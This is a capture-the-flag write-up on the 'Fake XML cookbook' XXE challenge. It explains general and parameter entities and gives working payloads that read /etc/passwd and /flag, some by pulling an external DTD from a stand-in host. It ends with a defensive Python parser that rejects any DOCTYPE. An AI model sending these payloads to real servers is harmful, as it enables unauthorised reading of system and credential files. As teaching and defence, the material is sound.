Fake XML cookbook: an XML XXE vulnerability
2022-07-23 15:50:00 【A traveler】
Background:
What is XXE?
Understand the XXE vulnerability in five minutes
Exploitation
XML vulnerabilities _cjm..... blog - CSDN Blog _xml vulnerabilities
XXE vulnerability: XML External Entity injection
When an application receives XML from users, either as an uploaded XML file or as POST request data, and it neither prohibits XML references to external entities nor filters the user-submitted XML data, an XML external entity injection vulnerability arises, namely the XXE vulnerability.
Example 1:
<?xml version="1.0"?><!DOCTYPE a [<!ENTITY b SYSTEM "file:///etc/passwd" >]><x>&b;</x>
If the XML above is parsed, the contents of /etc/passwd are returned.
Example 2:
<?xml version="1.0"?><!DOCTYPE a [<!ENTITY % d SYSTEM "http://xxx.com/xxe.dtd" >%d;]><x>&xxe;</x>
The content of http://xxx.com/xxe.dtd is:
<!ENTITY xxe SYSTEM "file:///etc/passwd" >
You may have noticed that example 1 has no % while example 2 does. The difference is that example 1 defines a general entity, whereas example 2 defines a parameter entity. A parameter entity can only be used inside the DTD, which is what the %d; in example 2's code does: just as a general entity is referenced outside the DTD, %d; here pulls the file http://xxx.com/xxe.dtd into the DTD.
Example 3:
<?xml version="1.0"?><!DOCTYPE a SYSTEM "http://xxx.com/xxe.dtd"><x>&xxe;</x>
The content of http://xxx.com/xxe.dtd is:
<!ENTITY xxe SYSTEM "file:///etc/passwd" >
This challenge:
Capture the request:

Inject the XML entity directly:
<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE note [
<!ENTITY admin SYSTEM "file:///etc/passwd">
]>
<user><username>&admin;</username><password>123456</password></user>
Note that entities follow a fixed template.
Then go on to read the flag:
<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE note [
<!ENTITY admin SYSTEM "file:///flag">
]>
<user><username>&admin;</username><password>123456</password></user>
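Every payload above depends on the server-side parser accepting a DOCTYPE in the request body. The following added example (not from the original post or the challenge's code) shows a login-body parser in Python that refuses any DTD before an entity can be declared. The function names are hypothetical, and the element names are taken from the request shown above.

```python
import xml.parsers.expat as expat

class ForbiddenXML(ValueError):
    """Raised when a request body carries a DTD (the carrier for every XXE entity)."""

def parse_login(body: bytes) -> dict:
    """Parse <user><username/><password/></user>, refusing any DOCTYPE."""
    fields, path, text = {}, [], []

    def on_doctype(name, system_id, public_id, has_internal_subset):
        # Fires before any <!ENTITY ...> is read, so nothing is ever resolved.
        raise ForbiddenXML(f"DOCTYPE {name!r} rejected (system id: {system_id!r})")

    def on_start(name, attrs):
        path.append(name)
        text.clear()

    def on_end(name):
        if path in (["user", "username"], ["user", "password"]):
            fields[name] = "".join(text)
        path.pop()

    parser = expat.ParserCreate()
    parser.StartDoctypeDeclHandler = on_doctype
    parser.StartElementHandler = on_start
    parser.CharacterDataHandler = text.append
    parser.EndElementHandler = on_end
    parser.Parse(body, True)
    return fields

def is_rejected(body: bytes) -> bool:
    try:
        parse_login(body)
    except ForbiddenXML:
        return True
    return False

# Constructed inputs: a normal login body, then the entity forms shown on this page.
BENIGN = b"<user><username>alice</username><password>123456</password></user>"
PAGE_SAMPLES = [
    b'<?xml version="1.0"?><!DOCTYPE a [<!ENTITY b SYSTEM "file:///etc/passwd" >]><x>&b;</x>',
    b'<?xml version="1.0"?><!DOCTYPE a [<!ENTITY % d SYSTEM "http://xxx.com/xxe.dtd" >%d;]><x>&xxe;</x>',
    b'<?xml version="1.0"?><!DOCTYPE a SYSTEM "http://xxx.com/xxe.dtd"><x>&xxe;</x>',
    b'<?xml version="1.0" encoding="utf-8"?><!DOCTYPE note [<!ENTITY admin SYSTEM "file:///flag">]>'
    b"<user><username>&admin;</username><password>123456</password></user>",
]

if __name__ == "__main__":
    print(parse_login(BENIGN))
    print([is_rejected(s) for s in PAGE_SAMPLES])
```

Rejecting the DOCTYPE outright covers general entities, parameter entities and external DTDs alike, which is why all three example forms fail at the same handler.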